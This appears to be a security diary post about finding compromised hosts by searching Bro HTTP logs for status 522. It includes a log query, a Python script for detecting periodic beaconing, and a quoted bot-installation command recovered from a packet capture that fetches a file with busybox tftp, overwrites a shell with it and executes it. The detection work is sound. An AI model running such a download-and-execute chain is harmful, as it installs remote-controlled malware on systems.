
522 Error Code for the Win

Published: 2016-08-17
Last Updated: 2016-08-17 01:36:37 UTC
by Tom Webb (Version: 1)
2 comment(s)


Recently I ran across a tweet from Packet Watcher (@jinq102030) suggesting that you keep an eye on HTTP status code 522 for possible malware check-ins. A 522 can mean several things, but from an IR perspective it may mean that a malicious host has been taken offline while a client on your network is still trying to connect to it. So I had our intern check the Bro logs to see what he could find.

>zcat http* | bro-cut ts id.orig_h id.resp_h host status_code | awk '$5 == "522"'


1467159441.247406    -    522
1467160356.407366    -    522
1467161271.647320    -    522
1467163102.087490    -    522
1467164017.337316    -    522
1467164932.547084    -    522
1467182323.201685    -    522
1467183238.447046    -    522
1467184153.641505    -    522
1467185068.903194    -    522


There was other traffic that turned out to be false positives, but it was easy to tell that this IP was checking the same site on a regular basis. Out of 4GB of compressed Bro logs for the day, only about 200 lines matched in total, so the noise ratio was very low.
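The regular spacing in the output above is the tell. As an added example (not part of the diary), the script below reads the same tab-separated fields the bro-cut command emits, keeps only the 522 lines, and flags any client/host pair whose check-ins land on a fixed interval, tolerating a missed beacon. The timestamps are the ones from the diary; the IP addresses and hostnames are constructed placeholders.

```python
"""Flag periodic HTTP 522 check-ins in Bro/Zeek http.log output.

Input is the output of `bro-cut ts id.orig_h id.resp_h host status_code`.
522 is the code Cloudflare returns when it cannot reach the origin server,
so a client that keeps getting it on a schedule is worth a look.
"""
from collections import defaultdict

# Constructed sample (IPs/hosts are placeholders, timestamps from the diary):
# 10.0.0.5 checks in every ~915 s with one missed beacon; 10.0.0.9 is a one-off.
SAMPLE = """\
1467159441.247406\t10.0.0.5\t203.0.113.10\tupdate.example.invalid\t522
1467160356.407366\t10.0.0.5\t203.0.113.10\tupdate.example.invalid\t522
1467161271.647320\t10.0.0.5\t203.0.113.10\tupdate.example.invalid\t522
1467163102.087490\t10.0.0.5\t203.0.113.10\tupdate.example.invalid\t522
1467164017.337316\t10.0.0.5\t203.0.113.10\tupdate.example.invalid\t522
1467164932.547084\t10.0.0.5\t203.0.113.10\tupdate.example.invalid\t522
1467160000.000000\t10.0.0.9\t198.51.100.7\tcdn.example.invalid\t200
1467161000.000000\t10.0.0.9\t198.51.100.7\tcdn.example.invalid\t522
"""

def parse_522(text):
    """Return {(orig_h, host): [ts, ...]} for every line with status 522."""
    hits = defaultdict(list)
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, orig_h, _resp_h, host, status = line.split("\t")
        if status == "522":
            hits[(orig_h, host)].append(float(ts))
    return hits

def beacon_period(timestamps, tolerance=0.05, min_hits=4):
    """Return the beacon interval in seconds if the hits are periodic, else None.
    Every gap must be close to an integer multiple of the smallest gap, so a
    missed check-in (a 2x gap) does not break detection."""
    ts = sorted(timestamps)
    if len(ts) < min_hits:
        return None
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    base = min(gaps)
    for g in gaps:
        k = round(g / base)
        if k < 1 or abs(g - k * base) > tolerance * base:
            return None
    return round(base)

def find_beacons(text):
    """Map each periodic (orig_h, host) pair to its interval in seconds."""
    return {k: beacon_period(v) for k, v in parse_522(text).items() if beacon_period(v)}

if __name__ == "__main__":
    for (src, host), period in find_beacons(SAMPLE).items():
        print(f"{src} -> {host}: 522 every ~{period}s")
```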

When we looked at the full packet capture for the system in question, we were able to tell that it had been compromised and had downloaded a bot:


cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

This is certainly something we are going to keep looking at as a way of finding more compromised systems.


Tom Webb

